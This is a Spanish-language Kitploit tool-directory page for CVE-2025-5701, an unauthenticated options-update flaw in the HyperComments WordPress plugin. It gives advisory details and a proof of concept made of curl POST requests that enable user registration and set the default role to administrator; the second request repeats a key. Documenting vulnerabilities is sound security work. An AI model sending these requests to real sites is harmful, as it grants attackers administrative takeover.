Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-5701 — HyperComments <= 1.2.2 - Actualización de opciones arbitrarias sin autenticación (Suscriptor+) | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/cve-2025-5701
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónMala Configuración
GitHubrandomrobbiebf/cve-2025-5701

CVE-2025-5701

HyperComments <= 1.2.2 - Actualización de opciones arbitrarias sin autenticación (Suscriptor+)

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-5701

HyperComments <= 1.2.2 - Actualización arbitraria de opciones sin autenticar (Subscriber+)

Descripción

El complemento HyperComments para WordPress es vulnerable a la modificación no autorizada de datos, lo que puede conducir a una escalada de privilegios debido a una falta de comprobación de capacidades en la función hc_request_handler en todas las versiones hasta la 1.2.2 incluida. Esto permite que atacantes no autenticados actualicen opciones arbitrarias en el sitio de WordPress. Esto puede aprovecharse para actualizar el rol predeterminado de registro a administrador y habilitar el registro de usuarios, lo que permite a los atacantes obtener acceso de usuario administrativo a un sitio vulnerable.

Detalles

  • Tipo: plugin
  • Slug: hypercomments
  • Versión afectada: 1.2.2
  • Puntuación CVSS: 9.8
  • Clasificación CVSS: Crítico
  • Vector CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • CVE: CVE-2025-5701
  • Estado: Cerrado

POC

root@kitploit:~
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
  -d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
  -H "Content-Type: application/x-www-form-urlencoded"
root@kitploit:~
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
  -d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
  -H "Content-Type: application/x-www-form-urlencoded"
Descargar herramienta